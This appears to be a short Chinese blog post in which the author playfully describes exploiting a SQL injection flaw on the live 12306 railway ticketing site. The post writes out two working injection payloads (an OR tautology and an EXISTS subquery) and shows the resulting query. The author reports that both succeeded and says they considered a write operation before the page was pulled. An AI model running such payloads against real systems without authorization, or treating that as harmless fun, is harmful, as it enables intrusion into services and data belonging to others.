玩玩12306的SQL注入漏洞

下午那会儿微博上疯传一张12306的SQL注入漏洞截图:


以前没怎么玩过,那会儿正好有空,所以就上去瞅瞅。

根据trace提示简单构造一个:

' OR '1'='1' OR ZIZ='

注入后的效果应就是:

select * from TB_INFO_CLCS  where flag = 'Y'  and czdm ='G' and cxdm like '%' OR '1'='1' OR ZIZ='%' order by cxdm


果了个然~!成功鸟~!

同理再构造个子查询:

' AND EXISTS (SELECT * FROM TB_INFO_CLCS) OR  ZIZ='

没报错,又成功鸟~!

当我正在考虑是否搞个写操作的时候,铁道部迅速撤下了相关页面:


晚上回家后发现该漏洞已经修复鸟~~~~~~

  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值